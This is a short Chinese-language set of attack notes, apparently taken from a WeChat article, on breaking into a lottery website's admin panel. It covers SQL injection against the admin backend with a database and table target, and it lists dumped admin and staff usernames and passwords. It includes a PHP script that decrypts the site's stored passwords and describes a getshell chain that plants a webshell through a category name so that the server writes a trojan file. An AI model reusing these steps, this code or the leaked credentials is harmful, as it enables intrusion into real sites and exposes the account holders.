https://mp.weixin.qq.com/s/eqb5LlYL9l1rQuaJhTztMQ
后台管理处sql注入
-D dfsql -T caipiao_adminmember
admin facai@88 555888
qq002 123456 123456
qq001 123456 12312
kefu001 123456 888888解密脚本
<?php
$password='MDAwMDAwMDAwML6hd86RutB6h6qXbQ';
function decrypt($data, $key = ''){
$key = md5('');
$data = str_replace(array('-','_'),array('+','/'),$data);
$mod4 = strlen($data) % 4;
if ($mod4) {
$data .= substr('====', $mod4);
}
$data = base64_decode($data);
$expire = substr($data,0,10);
$data = substr($data,10);
if($expire > 0 && $expire < time()) {
return '';
}
$x = 0;
$len = strlen($data);
$l = strlen($key);
$char = $str = '';
for ($i = 0; $i < $len; $i++) {
if ($x == $l) $x = 0;
$char .= substr($key, $x, 1);
$x++;
}
for ($i = 0; $i < $len; $i++) {
if (ord(substr($data, $i, 1))<ord(substr($char, $i, 1))) {
$str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));
}else{
$str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));
}
}
echo base64_decode($str);
}
echo decrypt($password);
?> getshell
appHomeControllerNewsController.class.php 这个文件通过这个调用F()函数生 成了/Runtime/Data/catelist.php/catelist.php文件
相当于就是通过在后台资讯栏目中栏目名称写入我们的 webshell,然后再去前台 进行注册,注册好后点击你修改的上级栏目,即可出发的函数,写入木⻢
最后访问 ssRuntime/Data/catelist.php 就会生成 Runtime/Data/a.php 这个木马